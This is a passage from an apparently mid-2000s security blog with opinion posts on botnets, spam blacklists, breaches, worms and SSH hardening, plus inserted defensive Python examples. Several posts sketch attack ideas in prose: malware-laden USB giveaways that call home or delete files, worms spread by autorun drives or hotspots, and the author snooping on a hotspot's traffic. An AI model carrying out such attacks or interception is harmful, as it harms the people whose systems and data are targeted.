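      unknown-mac      - a station whose MAC is not on the allow-list
      ip-mac-mismatch  - a known IP answered by a MAC other than the expected
                         one (what ARP spoofing of a gateway looks like)
    """
    expected_mac = {ip: mac for mac, ip in known.items()}
    alerts = []
    for line in text.splitlines():
        parsed = parse_neigh_line(line)
        if parsed is None:
            continue
        ip, mac = parsed
        if mac not in known:
            alerts.append(("unknown-mac", ip, mac))
        if ip in expected_mac and expected_mac[ip] != mac:
            alerts.append(("ip-mac-mismatch", ip, mac))
    return alerts


if __name__ == "__main__":
    for kind, ip, mac in check_neighbours(SAMPLE_NEIGH):
        print(f"{kind:16} {ip:15} {mac}")
```

Run it from cron against `ip neigh show` (or an old box's passive capture) and the fourth sample line is the one to care about: the gateway's IP claimed by an unknown MAC.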

This isn't the only reason we have insecurity, obviously. There are time issues and often pressures from outside the competent developer's control. And there is much to be said about defense in depth by doing everything one can to make a more secure product, but I still believe the basics are what comes first. The obfuscation needs to come after. The creative workarounds that could be obsolete next year need to be second.

The future is still going to remain with open source tools and creative ways of being an expert with the basics. Not on spendy and fancy workarounds that too often miss the real points of insecurity or create insecurity itself. Besides, even something as epidemic as XSS is not a difficult issue to either exploit (usually) or prevent. This is basic stuff that we're still struggling with.

(On a flip side, I find it equally as bad to be both complex and an expert in it, as that means only you have the knowledge to make things work...complexity begets complexity begets less security...)
.: hoping ISPs are not going to tackle the botnets and zombies
There is more and more talk of people (typically people that just talk about things, i.e. analysts, as opposed to people who really *do* anything) wanting the ISPs to take up the battle against botnets and zombies. Personally, I feel that if ISPs are going to be forced into taking care of things closer to the end-user or that affect the end-user (either through detection and/or shunning after a threshold), they're going to go balls-out and go farther than I, as a consumer, want them to go.

It is already difficult enough to shop around for an ISP that gives me a static IP (or at least very low turnover dynamic), allows me unfettered incoming and outgoing ports, and allows me to use my own mail and DNS servers as I see fit. I don't want that crap done for me. And I don't want to pay for business-class service. But if I were an ISP forced to go this route, forced to tackle a layer in the communications that I wasn't really supposed to tackle (this is like asking the physical layer to protect the sessions), I would make damn sure I log everything I can and get as far as I can and as thorough as I can before consumers start decrying privacy issues and freedom of service. This is a ball I do not want to have started rolling.

Besides, I don't really think ISPs are going to dent that particular problem right now. I'd rather they were left to focus on what they do best, and provide me with uptime, reliability, and faster circuits. I don't want to have my system shunned (loss of reliability) because one of my neighbors can't stop visiting infested porn pages or out of the blue if it is my system affected.

But yes, I do think security will still head towards the switch, only the switch will be inside corporations and inside the user home.
.: how much longer will open source last?
Open source software is considered by many to be the untainted version of freeware available on the web. Far too often, "freeware" packages in other smaller programs, from announced installs like Google or Yahoo toolbars to unannounced installs like spyware and adware. Open source is a much, much more trusted "standard" for web surfers to download and install programs while sleeping easier at night.

But I wonder how long such trust will last. I download and install open source apps regularly, and in fact, unless I know the application well I don't install a closed source app when open source has alternatives. But do I look at the source code to check and make sure some spyware app isn't packaged inside it? How many other people compile the source themselves, let alone truly understand the code enough to feel safe? And if someone with programming knowledge does this, will he be able to let the rest of us know and "out" the application?

Right now we (I) have blind trust in something deemed open source, and maybe a little more trust in something open source available on SourceForge or through a package manager, but there will someday come a time when even open source is not safe from the little things installed by determined marketers. What if an application is only really "safe" if manually compiled from source, but the compiled binary version has small print in the EULA hinting at additional software...?
.: death by a thousand cuts...the details will kill us
UCLA just announced the disclosure of private data on 800,000 persons. I find it disturbing that the "attacks occurred between October 2005 and November 2006." I almost suspect that that is only as far back as backup tapes and/or logs go. And there were multiple attacks? I would be willing to put money down on the detection being accidental on the part of the network admins. Maybe someone just looking at something they normally don't, or seeing something odd when troubleshooting an extraneous error as opposed to an IDS barking alerts or alarms going off or the attacker(s) being noisy.

Information security and insecurity isn't going away, and it is very hard to ultimately protect juicy targets. IT is understaffed and underbudgeted. We complained about this 8 years ago and we still complain about it because technology and information have grown along with staffs.

We also have an inability to share information. We work in an industry that cannot disclose details without the very real fear of lawsuits. But we desperately need to share this. We need to share what broke down in UCLA's detection strategies. We need to share how they learned of the incident and investigated it. We need to share the goods and the bads, what works and what doesn't work, the internal political barriers and the champions who push through them. Otherwise this issue just cannot go away and we'll only have analysts and journalists telling us (and our management) what "should" be done with absolutely no regard to the feasibility of those measures. (Of note, I love analysts/journalists telling companies how easy it is to encrypt full hard drives just because they were able to encrypt their own hard drive once, two weeks ago, and then didn't like it and removed it...)

If we are to start making headway, we need the details. Otherwise the details, in their silence, will kill prevention.
.: not only have criminals matured, but so have security pros!
Ten years ago, it was still common to refer to hacking groups by their creative and rather dark names like Cult of the Dead Cow, and handles like Master of Disaster. These days, hacker criminals (note the use of the adjective "criminals" to qualify an otherwise non-negative "hacker" noun) have matured their practices from just being curious and annoying and destructive to being profitable. But so have the security pros. While there are still people like Major Malfunction and Phenoelit around (and many, many others), just look at my list of links to the right, especially the blogs. I now have more real life names than I would ever have had 10 years ago.

That's not to say hackers do not have witty handles anymore, but there is that maturing going on in all facets of this industry. Curious, if nothing else. Me? I like the ability to use a handle to protect my identity online just a little bit more. Games, forums, IRC, IM...everything still asks for a unique username, so may as well blend that in with my industry handle. Better than being Avengerr26078 or Neo643389x!
.: see ya open relay database!
The Open Relay Database service has called it quits finally. ORDB provided a blacklist of known and/or suspected spamming SMTP services based largely on IP addresses.

This was always a bad idea. I dislike lame workarounds for a problem inherent in the protocol itself: lack of authentication. Trying to tack on security just won't work here. You might be able to shun a large swath of spam, but you also catch a lot of dolphins in the net as well. Take me for instance. My home mail server is on a DSL or cable line. The ORDB labeled my connection as a home-based system or even "dynamic IP" and thus anyone using their blacklist dropped any email I sent. Most companies that used this blacklist also did not accept free mail services like Gmail and Hushmail. It truly made communicating with some companies extremely problematic. I never did get a response from ORDB about my reservations (to put it lightly). You can drop 100,000 spam messages and no one will care. If you drop 1 extremely important email from a VP, heads roll. This does affect most any spam protections, but shunning by IP is not the solution.

Likewise, I've heard tales of legitimate companies being placed onto the blacklist, and having a huge hell of a time trying to get off the list. There is no real definitive threshold or line drawn where, when complaints cross it, the site is put on the blacklist. This means that the larger the institution, the more likely a few clueless people will report legitimate mail that they requested, as spam, and screw up the company. Not a cool model.

So, rather than just complain, what do I recommend? Honestly, I'm not sure. There must be signature-based detections, but that relies on someone keeping the signatures updated (outside service). This should be accompanied by automatic denial of certain types of emails, such as emails with .com attachments and so on. There should be some measure of Bayesian/subjective analysis, but that can't be terribly draconian otherwise legitimate emails will be dropped. When it comes to my home network, I'd rather delete a few rogue emails than lose a few mis-categorized emails. I also believe in layered defenses, so this network-based detection can be augmented by utilizing any client-side "junk" filters. Most email programs today include some sort of manually-configurable junk filter that can "learn" as you use it. Utilize that for anything that gets through the initial procedures.
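The layering described above in code, as an added example (not from the original post and not SpamAssassin's or Postini's logic): a hard deny-list on attachment types runs first, then a small naive Bayes scorer, and the threshold at which the Bayesian layer starts calling mail junk is what separates the "I'd rather delete a few rogue emails" home setting from a stricter corporate one. The training corpus, the deny-list and the test messages are constructed and tiny; the mechanics are what matter.

```python
"""A layered inbound mail filter: hard deny-list first, Bayesian score second."""
import math
import re
from collections import Counter

# Layer 1: attachment types that are never accepted (constructed list; the post
# names .com, the rest are other directly executable Windows types).
BLOCKED_EXTENSIONS = {".com", ".exe", ".scr", ".pif", ".bat"}

# Layer 2: constructed training corpus for the Bayesian scorer. Real deployments
# train on hundreds of messages; this is only enough to show the mechanics.
SPAM_TRAINING = [
    "cheap viagra pills order now",
    "you have won a prize claim now",
    "lowest price pills online order",
    "win big casino bonus claim",
]
HAM_TRAINING = [
    "meeting moved to tuesday see agenda",
    "can you review the patch before the release",
    "lunch tomorrow with the team",
    "the quarterly report is attached for review",
]

TOKEN_RE = re.compile(r"[a-z0-9']+")


def tokenize(text):
    """Lower-cased set of word tokens; presence, not frequency, is what we score."""
    return set(TOKEN_RE.findall(text.lower()))


class BayesScorer:
    """Naive Bayes over token presence, with add-one smoothing."""

    def __init__(self, spam_texts, ham_texts):
        self.spam_docs = Counter()   # token -> number of spam messages containing it
        self.ham_docs = Counter()    # token -> number of ham messages containing it
        for t in spam_texts:
            self.spam_docs.update(tokenize(t))
        for t in ham_texts:
            self.ham_docs.update(tokenize(t))
        self.n_spam = len(spam_texts)
        self.n_ham = len(ham_texts)

    def spam_probability(self, text):
        """P(spam | tokens), computed in log space to avoid underflow."""
        total = self.n_spam + self.n_ham
        log_spam = math.log(self.n_spam / total)
        log_ham = math.log(self.n_ham / total)
        for tok in tokenize(text):
            log_spam += math.log((self.spam_docs[tok] + 1) / (self.n_spam + 2))
            log_ham += math.log((self.ham_docs[tok] + 1) / (self.n_ham + 2))
        peak = max(log_spam, log_ham)
        p_spam = math.exp(log_spam - peak)
        p_ham = math.exp(log_ham - peak)
        return p_spam / (p_spam + p_ham)


SCORER = BayesScorer(SPAM_TRAINING, HAM_TRAINING)


def filter_message(body, attachment_names, threshold, scorer=SCORER):
    """Return ("reject", reason), ("junk", score) or ("deliver", score).

    threshold is where the Bayesian layer starts calling a message junk: a home
    user who would rather delete a stray spam than lose real mail sets it high
    (0.9); a corporate gateway that tolerates no spam sets it lower (0.5).
    """
    for name in attachment_names:
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext in BLOCKED_EXTENSIONS:
            return "reject", f"blocked attachment type {ext}"
    score = scorer.spam_probability(body)
    return ("junk" if score >= threshold else "deliver"), score


if __name__ == "__main__":
    for body, files in [("order cheap pills now", ["notes.txt"]),
                        ("claim the report now", ["notes.txt"]),
                        ("please review the report before the meeting", ["invoice.com"])]:
        print(f"{body!r:50} home: {filter_message(body, files, 0.9)}  "
              f"corp: {filter_message(body, files, 0.5)}")
```

The middle message is the interesting one: it scores a little over 0.5, so the corporate threshold junks it and the home threshold delivers it, which is exactly the "can't be terribly draconian" trade-off.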

The rules change a bit when you talk about corporate email systems, however. No one wants their users to get even any spam mail, let alone something offensive or not appropriate. In a corporation, I really believe either the company needs to accept some measure of spam (typically smaller companies with smaller budgets, who also may be more needing to see emails from servers like mine) or spend the money to fully outsource it to a professional spam blocker. For comprehensive and intelligent and highly accurate spam blocking, I feel no company can do this alone. We use Postini at work, and I have to say I've been quite happy with it. Basically get a service upstream, filter emails, and then receive only the good stuff. This helps take pressure off corporate IT to become spam experts 24/7. That's just not practical.

Ultimately, I'll have more opinion on this after I play with SpamAssassin some more. I really do believe SMTP is a good protocol, but the Internet has grown larger and more depended-upon than SMTP was designed for. I consider it an already-dead technology that will linger for many, many more years simply because of the low cost and ease of usage. It will eventually be replaced with voice services or SMS and messaging services. The only effective difference between email and IM is the ability for mail to be held on the server until the user logs in and retrieves it. Yahoo does this in IM and has done it for years, and Google continues to make Gmail and GoogleTalk features more and more overlapped to achieve that switchover.
.: 2006: the year the blanket of ignorance started sliding off
One author has dubbed 2006 the year of the breach. I disagree. I think this year is the year when the blanket of ignorance has started sliding off. We've not had more data disclosures or identity thefts. We've just heard about them more than in previous years. Laptops have always been lost and data has always been on them that should either not have been or at least encrypted. This is not new. But our talking about it in mainstream circles and media is new, especially in light of erected regulations forcing such disclosures.

In addition, drivers, particularly wireless ones, were outed throughout the year, and all those quiet little problems with their code quality have come to light in quite dramatic fashion. This is still a fairly quiet problem, however, probably because unless you're installing a new system or a gamer, no one really regularly updates drivers. People still want to just ignore the problem.

Web 2.0 started getting beaten around a bit as application developers are still pounding out insecure code, but several researchers showed us that this is all deeper than we thought. Javascript and HTML are capable of very similar attacks and recon exploits. We all feel a bit less safe on the web as a whole. The Month of Kernel Bugs has opened eyes to kernel issues, full disclosure, and software patching processes in open and closed source projects.

While few of these issues are truly new, and nearly as many are still not really solved, at least we're talking about them in public and they are getting attention. We can no longer live with self-inflicted ignorance in management who would rather not think about a lost laptop and be even less inclined to admit to anyone that one was lost when it does happen.
.: a bunch of papers from my old site that I need to reprint or read
(note: I will be removing these as I read them.) update: I've decided not to remove some, as they are "classics" and I'd like to keep the link for my future possible reference

This GIAC practical paper is a massive look at the firewall stance of a fictitious company's complicated network. Very detailed paper and I really look forward to reading it someday soon.

A paper on detecting wireless discovery tools like Stumbler.

A paper on detecting wireless lan mac spoofing. A bit dated, but still a nice little bit of knowledge to have when looking into wireless forensics and traffic.

A fictional Red Team Assessment paper. This paper is a practical for a GIAC certification. Interestingly enough, it is actually a response/engagement to a previous GIAC practical paper submitted by another certifyee.

A short paper from Joatblog on fingerprinting, but also contains a nice list of resource links at the bottom.

And this is why you block ICMP (or at least monitor it closely): ICMP tunneling. This is a vein of project I've been wanting to do for some time now, along with an SSH tunnel that I can set up from anywhere and use things like a wireless hotspot and still maintain a good measure of privacy.

A paper on how to install a secure Linux web/mail/dns server. Requires .pdf viewer.

Part 1 of a series of papers on Linux Security. Tons of links to other resources at the bottom.

NSA's 60-Minute Network Security Guide. A nice little overview type of read that covers as much as some network security books cover. Nice little inspiration and start to getting into a mindset.

An article on understanding tcp reset attacks. Have yet to read this one.

University of Washington course on modern cryptography has been placed online. Might be some good material to read on a rainy day.

.: schneier
I read Bruce Schneier's weblog on a pretty much daily basis, and I truly appreciate what he brings to security punditry, especially things outside of strictly network and computer security.

But the more I read from Bruce, the more I am convinced that stories he points out will be forever and universal. There will never be any type of security that relies on people that cannot be circumvented, even if by accident, one time out of 1,000,000. It fuels people like this because the stories will never go away. People will always make mistakes and someone somewhere will point it out and make everyone else cry that we should have 100% perfect security and spend more money to get that last .01% failure rate removed. That's just not always realistic. The effort is nice and I do appreciate his efforts to keep people from being blissfully ignorant about what security really is versus the perception, but he is like sugar to me. Take samples of it, not heaping spoonfuls, for best enjoyment.

.: html in email
Maybe I am a bit old-school already, but I like the sound of this news post:
Due to an increased network threat condition, the Defense Department is blocking all HTML-based e-mail messages...

The JTF-GNO mandated use of plain text e-mail because HTML messages pose a threat to DOD because HTML text can be infected with spyware and, in some cases, executable code that could enable intruders to gain access to DOD networks, the JTF-GNO spokesman said.

In an e-mail to Federal Computer Week, a Navy user said that any HTML messages sent to his account are automatically converted to plain text.
This is one of those battles I resoundingly lost in my last job: forcing Outlook to display emails as plain text. I'm one of those people who sees absolutely no need to make emails look pretty with embedded pictures. Marketing and sales think otherwise, of course. As far as my own emailing habits go, I'm pretty strict about making my outgoing emails all plain text, and most incoming mail plain text as well. You eliminate huge swaths of attacks by turning off HTML rendering in email programs...enough that really you're left with sheer stupidity in clicking links or running attachments, and you avoid all the hidden junk: JavaScript, remote content fetches, and links whose visible text doesn't match where they actually go.

If something needs to look pretty, put it in an attachment or link to the website inside the email body.
.: as the worm turns
Kliston over at the SANS Handler Diary recently posted about worms and how we won't see an SNMP-borne "Slammer-like" Internet worm, or maybe even any more worms like Slammer, despite the opening given by MS06-074.

I think he is somewhat correct. The Slammer worm exploited unpatched SQL Server and MSDE instances and caused a huge amount of havoc because of the unintended effect of flooding most networks with packets, to the point that they were unusable. From worms like this, authors have learned that if they want to have a good worm, you don't want to overload your own pipelines. Rabbits may multiply like nothing else, but once you get 5,673 of them stampeding over a bridge to get to new food sources, the bridge will collapse and they're all dead in the water, so to speak.

I think Kliston's best point was the oddity of tons of udp 1434 ports open to the world (Slammer was a single UDP packet, no handshake needed). This defies the common sense that administrators of today have, where databases are (or should be!) nestled deeply inside the network behind a few layers of protection between them and incoming Internet traffic. Firewalls have been built up quite a lot over the years, and I think many networks are much more resilient to network-borne worms coming from a public network. Unless something is able to pop apps on commonly opened ports (we're probably looking at IIS/Apache, sendmail/IIS, SSH/telnet, BIND...) that are widely used, I don't see any major outbreaks on the horizon. What we're then left with would be widespread apps running on IIS/Apache (Web 2.0 or common packages like phpBB) or perhaps IM propagation should something in a message be able to pop the app. And of course, some discovery in Cisco equipment could be catastrophic as they make up more of the bricks in our perimeters.

Now, that may nicely cover Internet-borne worms attacking over the dangerous public networks, but that is not to say there won't be pockets (sometimes LARGE pockets) of an SNMP worm. Even beyond the heyday of the Slammer worm there were still terrible outbreaks as laptops took hold and developers moved offsite with Slammer-susceptible MSDE instances. Once back in the comforts of the home network, such instances gobbled up any unpatched systems and vomited out onto the network wires. Similarly, an SNMP worm can piggy-back into a network as well, or be delivered via email or other means. Once loose inside a network, it can still have a catastrophic effect locally.

I have heard often that the network perimeter has disappeared. I disagree with that. Our networks have simply become more ephemeral, kind of like the kids starting to play outside the house and getting dirty by dinnertime. The house is still there; the perimeter is still there. I imagine as ipv6 starts to get realized (someday?) the calls will arise to do away with NAT and the perimeter once public address-space is again limitless. But, of course, that would pave the way for worms to come out of hibernation, so I hope that the perimeter is going nowhere even with ipv6.

Kliston's third leg mentions something lots of people have repeated all year long: malware authors have become more interested in profit than notoriety. Well, how about being paid to disrupt a competitor's network? And you just happen to have the ability to create an SNMP worm? And what if that competitor has poor network design and utilizes SNMP on his internal servers, and has a long cycle before those servers get patched? You might be able to realize this financial gain by sending your worm packaged into an attachment over email or perhaps scatter some USB flash drives in the parking lot (with eye-catching glitter-bits painted on to attract attention) with the worm autorunnable. All it might take is one execution and bam, their servers go from the same ol' grind to being tickled lightly to flat out all raising a new flag of ownership. Dramatic, yes.

Or, hang out at a local wireless hotspot that the employees frequent. With their laptops. Once away from the hardened corporate network, those devices may be ripe for the picking...and planting of a worm. Maybe corporate espionage is already here, but I suspect it will continue to get worse, whether the media picks up on it or not.
.: ccc23 and a new wiki
The Chaos Communication Congress, now in its 23rd year, has always been one of those conferences that gives me goosebumps to think about the innovation, creativity, and genius all packed into one place for a short amount of time. I enjoy watching many of the presentations after the fact as they are quite open about distributing them. They feature some amazing ideas and technologies and tend to be a bit more open about challenging governments than US cons. One of this year's bigger attractions is RFID tracking. I think it will be interesting to see tracking being brought more and more into our mainstream thinking. Much like the iPod+Nike revelation recently.

Also, DNS should be propagated by now for wiki.terminal23.net. Mediawiki freaked out last night when I changed the URL and VirtualHost for the site, but a quick reinstall made it happy again. I don't have much there and it will just be intended as a resource for me to track tools and tutorials, but I have started moving down that road enough to link it up from here.
.: catalyzing vpn and ssl security
Somehow this site slipped through my RSS feeds net, but the Security Catalyst has had a few interesting updates in the past month.

First, David Stern talks about VPN not being a security device. I think this can be confusing; I was linked to this post via someone saying VPNs offer no security and citing David. VPNs do provide security by encrypting traffic over a public network, although I do understand what David is trying to say. Typically, VPNs do not use more sophisticated authentication than other remote access methods, nor provide any further traffic protection beyond the VPN endpoint. If you let me VPN into your network, you'll have to deal with the fact that I might make connection attempts to Gmail or spew out Slammer traffic. Point made, but I think his point can be far too easily mistaken. At least the post made me sit back with a screwy look on my face for a few minutes! I tend to be a natural skeptic.

Second, is a post about explaining SSL security. This made me giggle: get a group of nearby people together and go over the security that SSL provides. Now, yes, I can explain SSL accurately, but I gotta be honest, even at work about zero of those people are going to give a shit about the details, even if spoken in elementary terms. I've worked at web-tech companies where I filled requests from people (developers and managers) for SSL certs, who themselves couldn't care less about the technical reasons. "The client requires SSL and Sysadmins get annoyed when we don't put them on," was the only real care; just a checkmark to filling the client's needs. Again, though, I see the point: education. But I doubt many people truly care what SSL is and how it truly works.

Here is a case in point. Go to MySpace.com and log in with your username (come on, everyone has one). Notice there is no https/SSL transaction? Yup, that's how much people truly care about SSL: MySpace.com's popularity doesn't seem so affected. (I discovered this one over a year ago at a wireless hotspot whose traffic I was snooping on...) Yes, perhaps it is not a banking site...
.: usb key espionage
One piece of marketing schwag I like to get are various small USB drives. I have a handful of Dell 64 MB keys that I use regularly, especially when with buds offsite. I wonder how hard it would be to order some USB keys printed with another company's logo, and then give them away at a tradeshow. Oh, I should mention that they can then be loaded with some malicious apps to infect any system they are plugged into and then call home after a few weeks. Or try to delete all files on the network the victim has access to. I wonder what kind of backlash that might send to the company whose logo is on those drives? We've had Sony putting rootkits on CDs and some iPods delivering trojans, so when are we going to see the first high-profile case of USB exploitation? And I'm not talking a pen-test effort, but an actual criminal case.

.: ubuntu unleashed and ubuntu hacks
I'm not an author like Bejtlich, but I do appreciate when he reviews books. I like reading reviews just so I can quickly weed out the bad apples and the good apples before buying something I'll wish I could take back. For my part, here are a couple of Ubuntu books. Just as background, I've run various Linux distros in the past for small periods of time, and I've supported Slackware boxes in a previous job, but I still consider myself a fairly new *nix user. Currently I dual-boot Ubuntu and WinXP on my main laptop, but I use Ubuntu 99% of the time lately.

Ubuntu Hacks is part of the really cool O'Reilly series of Hacks books. I've long enjoyed them because they take a specific question and answer it very succinctly and quickly. The authors don't spend a chapter or 15 pages over specific topics and thus don't get into much detail, but they get the hacks done. Ubuntu Hacks is no different and is really excellent to have for an Ubuntu newbie. I would recommend it for anyone with at least some familiarity with the Linux world. It might be worthy of being the only Ubuntu reference you need other than Google. Don't wait too long to get this though; like other Hacks books (and many "how to" geek books anyway) it will get outdated quickly.

Ubuntu Unleashed is a much thicker book that covers far more topics with far more depth than Hacks. Sadly, the authors seem to have just taken their Fedora Core Unleashed book and repackaged it as Ubuntu with some spotty word replacements and some Ubuntu specifics. It sucks to read about using Yum or Ubuntu Core in an Ubuntu book. Still, the book works for a newer Linux user like myself, but I wouldn't really recommend it due to the copied nature. In some places Hacks does in 2 pages what Unleashed barely gets correct in 10. With Ubuntu books dominating the Linux shelves at the bookstores, there are better Ubuntu books available than this one.
.: 2007 predictions
I'm not one for predictions, mostly because everyone else does them and I'm not necessarily an analyst. But I thought I would spit out what's on my mind. And no, I'll refrain from the obvious and take some more ballsy moves.

1. Efficiency is the name of the game with technology, not only in business but in criminality as well. Think of all the scams and attacks that have been performed for decades (plagiarism, fraud, identity theft, data theft, credit card skimming, phone phreaking, spam/junk mail, music/movie bootlegging/copying...). If there are some out there still untapped as a technological attack, they will start getting tapped. As phones and VoIP converge and cross international lines, so too will we start to feel the return of phone scams and telemarketers as call prices plummet and laws are unable to cross borders.

2. Several people made headlines this year, and maybe you could say they broke out. HDM, LMH, Jeremiah Grossman, and RSnake are the memorable names. The first two are pushing fuzzing; the latter two are abusing web attacks. That foursome and their lesser-known buddies and pals are the nucleus of active white hat hacking and disclosure. None of them are done yet, and I think 2007 will see a lot more activity and revelations from all four. What ports do people open on firewalls? BitTorrent and P2P. Fuzz those apps and we might find another worm for home systems.

3. With the widespread dismissal at how potentially dangerous wireless driver attacks can be, I still expect to see this minorly erupt. Granted, we won't see huge wormable activity, but damn is it nice that drivers are rarely updated and they are insecure still. I expect more news here and maybe a few landmark incidents in the wild. I wouldn't be surprised if governments and corporations are not already abusing this front in more targeted attacks.

4. You can't predict something in 2007 without thinking about botnets. Nothing scales better right now in the threat landscape than botnets. From DDoS to extortion to DNS attacks to just taking your 20,000 infected hosts and stealing host information; it's going to be worth money to someone. I expect these to get more sophisticated as botherders realize the true power they have. I wouldn't be surprised to see some of the compromised systems get special attention as a stepping-stone into behind-the-firewall recon and attacks. A .gov bot? Cha-ching! We have no real counter to botnets right now, and this war can only escalate. How about that SNMP worm that people think won't come? Release that via the bots and you can have a lot of fucked up networks despite strong firewalls.

5. Regulations and standards will start to be questioned as data disclosures and high-profile attacks won't go away. Just like government report cards being useless, so too will standards compliance checkmarks. Just like "Hacker Safe" meant nothing to some websites that were still full of holes, so too will "XYC 21300 compliant" mean nothing. Organizations are too different and complex and the threats too different for standards to really be effective. Mgmt won't understand that for a few years yet. (On a similar note, as security moves into unified super-applications that try to do everything from one mgmt console, the skills of admins to understand the underlying technology and do things with free lower-level tools will become dangerously low in many organizations...maybe not in 2007, but ongoing.)

6. Lastly, da bears will finally win another Super Bowl.
.: sshd on windows
Just finished standing up an OpenSSH server on a Windows box mostly just to do it for once. I know, I know, it should be Linux. But I firmly believe this is a Windows world and like it or not, this request will someday come up just like this. I'll put a Linux one up on my next box.

All told, there are plenty of sites around that walk through setting up SSHD and Cygwin on Windows. Sadly, they all seem to leave the unsuspecting user very insecure. These commands are always listed:
mkpasswd -cl > /etc/passwd
mkgroup --local > /etc/group
These commands copy Windows users and groups over to the Cygwin environment. Yes, that includes accounts like Administrator and any other group that exists. There is a reason "root" is, and should be, denied login via SSH: it is the most predictable account to brute-force. Well, I would bet that on many Windows SSH installations, the Administrator password is likely pretty predictable too. To get around this, I just remove those users from /etc/passwd.
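Here, as an added example (my own script for this post, not anything from the Cygwin or OpenSSH docs), is a small Python program that does that cleanup mechanically: it drops the built-in accounts from the passwd file mkpasswd produced and prints an AllowUsers line for sshd_config. The passwd lines inside it are constructed, and the assumption that the account's SID sits at the end of the gecos field follows what old mkpasswd output looked like.

```python
"""Strip built-in Windows accounts from the Cygwin /etc/passwd that
mkpasswd writes, and emit an sshd_config AllowUsers line for what's left.

Added example for this post, not the page's or Cygwin's own code. The
passwd text below is constructed; the gecos field carries the account's
SID the way old mkpasswd output did, and RIDs 500/501 are the built-in
Administrator and Guest on every Windows box.
"""
import re

# Accounts never to expose over SSH, even if someone renamed Administrator.
DENY_NAMES = {"Administrator", "Guest", "HelpAssistant", "SUPPORT_388945a0"}
BUILTIN_RIDS = {500, 501}
# Well-known SIDs: S-1-5-18 (SYSTEM), S-1-5-32-544 (Administrators) and friends.
WELL_KNOWN_SID = re.compile(r"^S-1-5-(?:\d{1,2}|32-\d+)$")

# Constructed sample of `mkpasswd -l` output (name:pw:uid:gid:gecos:home:shell).
SAMPLE_PASSWD = """\
SYSTEM:*:18:544:,S-1-5-18::
Administrators:*:544:544:,S-1-5-32-544::
Administrator:unused:500:513:U-WINBOX\\Administrator,S-1-5-21-111-222-333-500:/home/Administrator:/bin/bash
Guest:unused:501:513:U-WINBOX\\Guest,S-1-5-21-111-222-333-501:/home/Guest:/bin/bash
HelpAssistant:unused:1000:513:U-WINBOX\\HelpAssistant,S-1-5-21-111-222-333-1000:/home/HelpAssistant:/bin/bash
michael:unused:1003:513:U-WINBOX\\michael,S-1-5-21-111-222-333-1003:/home/michael:/bin/bash
"""


def parse_passwd(text):
    """Split passwd lines into dicts; the SID is the last comma field of gecos."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
        sid = gecos.rsplit(",", 1)[-1]
        entries.append({"name": name, "uid": int(uid), "sid": sid, "line": line})
    return entries


def is_builtin(entry):
    """True for accounts an attacker can guess without knowing the box."""
    if entry["name"] in DENY_NAMES or WELL_KNOWN_SID.match(entry["sid"]):
        return True
    rid = re.search(r"-(\d+)$", entry["sid"])
    return bool(rid) and int(rid.group(1)) in BUILTIN_RIDS


def harden(text):
    """Return (passwd text without built-ins, names that were dropped)."""
    kept, removed = [], []
    for e in parse_passwd(text):
        (removed if is_builtin(e) else kept).append(e)
    return "".join(e["line"] + "\n" for e in kept), [e["name"] for e in removed]


def allow_users_line(passwd_text):
    """sshd_config directive that whitelists exactly the remaining accounts."""
    return "AllowUsers " + " ".join(e["name"] for e in parse_passwd(passwd_text))


if __name__ == "__main__":
    kept, removed = harden(SAMPLE_PASSWD)   # on a real box: open("/etc/passwd").read()
    print("dropped:", ", ".join(removed))
    print(kept, end="")
    print(allow_users_line(kept))
```

Removing an entry from /etc/passwd only keeps sshd from resolving that account; the Windows account itself is untouched and can still log in at the console. AllowUsers in sshd_config says the same thing explicitly, which is why the script prints it. PermitRootLogin does nothing for you here, since there is no "root" to deny.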

This just reminds me that security is not something everyone thinks about. And too often instructions that get passed around are not the most prudent instructions. That's great that a lot of people who likely shouldn't be allowed to, can now set up SSH servers on Windows and plop them onto the Internet and they work just fine. I guess it just takes a little more knowledge to know about the potential issues and then to solve them. I hear a lot about how security needs to be baked in, and while I agree, I think it will be a long time coming and will always cost either time and effort or money. (The same holds true for physical home security...)
.: a small rant day, and jesus is on my side
Over time, sometimes I get a few little pet peeves built up and I tend to use my blog here as a way to release those peeves. So today is deemed "rant day" and I'm going to shoot out a few small items that bother me.

community peeves
I understand that we're a worldwide community and as such, English is not everyone's first language. That's cool with me. But I dislike seeing English-speakers just massacre the language. Constant grammatical errors and broken sentences make Jesus want to punch babies.

Reading comprehension. This is a big one. You can almost tell when someone has read the first three lines of a mailing list email and spits out a reply to just those three lines; completely missing the rest of the message. Sometimes they give really good answers...to the wrong questions.

People who argue that there is only one right way to do something (their way). While protocols have not hugely changed and some things are very much the way they were 10 years ago, environments and business uses are vastly different. What works in one environment will maybe not work or be acceptable in another.

Saying there is no silver bullet to security, then pointing out how everything is broken just because it has one problem or two. This creates a nice little unachievable paradox. I see this used a lot by analysts who refuse to be wrong. I think the only acceptable solution to them is if Jesus sends down a sword-bearing angel to protect the data.

workplace peeves
Making work requests without providing the reason, authority, or problem that is being fixed. "I need access to John's files." Please explain the request in context so that we're not just making willy-nilly changes that may or may not fix the problem and may or may not be authorized. I think I see this in the workplace more often than any other pet peeve of mine.

Reading comprehension. My last job was not so bad at this, but my current company is just downright terrible when it comes to email coherency and reading comprehension. I purposely send out emails that are 2-3 sentences long to get right to the point, and people still don't read. Just yesterday I got a request to stand up a new email account. I replied back asking who needs access. The response I got back was, "It doesn't work yet." Jesus is starting to kill kittens now.

I love when users engage multiple people on a problem without telling anyone, i.e. abusing support processes or authority. Sometimes some people ask each IT employee their question until someone gives them the answer they want. Sometimes people escalate everything they don't get their way on, complaining to everyone until it is done. Others with authority sometimes engage 3 people to get their important task done, without realizing those three people may be stepping on each other's toes and wasting 2 of those people's time and possibly breaking other things in the process. If 3 people are going to work on a problem, I'd rather work together and share ideas than each of us secretly working separately.
.: a hackme box
I am embarking on a new project with a good friend of mine. I have taken one of my older laptops and installed an insecure version of Windows XP onto it. The insecurity has a number of different levels, and includes some vulnerable third-party services as well. The goal of this is to give it to him for a week and have him break into it. I've even put some fake services up that give back fake banners and capture whatever he does to those services. Maybe in a few more weeks, he'll set one up for me in similar fashion. If he breaks into the box, he has to show me how he did it. If he doesn't, I'll show him what I had in mind for an attack (i.e. there has to be a known and demonstrable attack vector).

